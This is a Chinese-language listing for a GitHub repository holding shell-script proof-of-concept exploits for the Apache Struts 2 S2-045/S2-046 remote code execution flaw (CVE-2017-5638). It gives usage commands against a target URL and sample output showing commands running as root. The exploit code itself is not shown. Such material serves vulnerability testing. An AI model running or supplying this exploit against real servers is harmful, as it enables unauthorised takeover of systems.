项目作者: KarzsGHR

项目描述 :
S2-046|S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
高级语言: Shell
项目地址: git://github.com/KarzsGHR/S2-046_S2-045_POC.git
创建时间: 2017-03-21T17:36:40Z
项目社区:https://github.com/KarzsGHR/S2-046_S2-045_POC

开源协议:

下载


S2-046_POC

Usage:

  1. ./s2_046.sh [url]
  2. ./s2_045.sh [url]

Sample:

  1. chmod +x ./s2_046.sh
  2. ./s2_046.sh http://172.16.152.135/index.action

OUTPUT:

  1. ================HTTP GET Method================
  2. uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
  3. uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
  4. ================HTTP POST Method================
  5. uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
  6. uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023